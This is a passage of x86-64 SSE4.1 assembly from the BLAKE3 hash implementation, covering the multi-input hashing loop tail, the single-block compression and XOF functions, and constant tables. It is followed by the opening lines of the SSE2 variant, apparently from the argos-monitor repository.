pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
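// The vector ops above leave RFLAGS untouched, so the "cmp rdx, r15" at
// the top of the loop still drives this jne back for the next block.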
mov eax, r13d
jne 9b
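// Transpose the four finished states back to row form; each input's
// 32-byte chaining value is stored contiguously at 32-byte intervals.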
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
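// Same counter-advance-with-carry trick as the wide path, on xmm width.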
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
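// Tail dispatch: 2 inputs, then 1.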
3:
test esi, 0x2
je 3f
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
pinsrd xmm14, dword ptr [rsp+0x124], 1
pinsrd xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
pinsrd xmm3, eax, 3
pinsrd xmm11, eax, 3
mov al, 7
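// Seven rounds over two interleaved states (xmm0-3 and xmm8-11).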
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm12, xmmword ptr [ROT16+rip]
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm13, xmmword ptr [ROT8+rip]
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
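// Message permutation for the next round, as in the four-lane path.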
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pblendw xmm13, xmm12, 0xCC
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
pblendw xmm12, xmm6, 0xC0
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pblendw xmm6, xmm5, 0xCC
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
pblendw xmm5, xmm14, 0xC0
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
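# If incrementing, advance the stored counter past the two lanes just hashed:
# blendvps selects between the old and lane-shifted counter words using the
# increment_counter mask saved at [rsp+0x130].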
movdqa xmm0, xmmword ptr [rsp+0x130]
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm2, xmmword ptr [rsp+0x120]
movdqu xmm3, xmmword ptr [rsp+0x118]
movdqu xmm4, xmmword ptr [rsp+0x128]
blendvps xmm1, xmm3, xmm0
blendvps xmm2, xmm4, xmm0
movdqa xmmword ptr [rsp+0x110], xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm3, xmm13
pinsrd xmm3, eax, 3
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
blake3_compress_in_place_sse41:
_blake3_compress_in_place_sse41:
_CET_ENDBR
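# In-place compression. SysV args (matching the upstream C prototype):
# rdi = 8-word CV, rsi = 64-byte block, rdx = block_len, rcx = 64-bit counter,
# r8 = flags. block_len and flags are packed into one qword so that state
# row 3 becomes (counter_lo, counter_hi, block_len, flags).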
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
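# al counts down the 7 BLAKE3 rounds; between rounds the message words in
# xmm4-xmm7 are permuted in-register.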
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
blake3_compress_xof_sse41:
_blake3_compress_xof_sse41:
_CET_ENDBR
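# XOF variant: same args as compress_in_place plus r9 = 64-byte output buffer;
# dl/r8b are zero-extended before being packed into state row 3.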
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
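# XOF finalization: rows 0-1 get the usual feed-forward (xor with rows 2-3),
# and rows 2-3 are additionally xored with the input CV so all 64 bytes of
# the state can be emitted.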
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
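# Row 2 of the initial state: the first four words of the BLAKE3 IV
# (shared with SHA-256).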
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
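# pshufb masks: ROT16 rotates each 32-bit lane right by 16, ROT8 by 8.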
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
|
mit-enclaves/argos-monitor | 68,858 | C/libraries/sdktyche/loader/blake3_sse2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse2
.global _blake3_hash_many_sse2
.global blake3_compress_in_place_sse2
.global _blake3_compress_in_place_sse2
.global blake3_compress_xof_sse2
.global _blake3_compress_xof_sse2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse2:
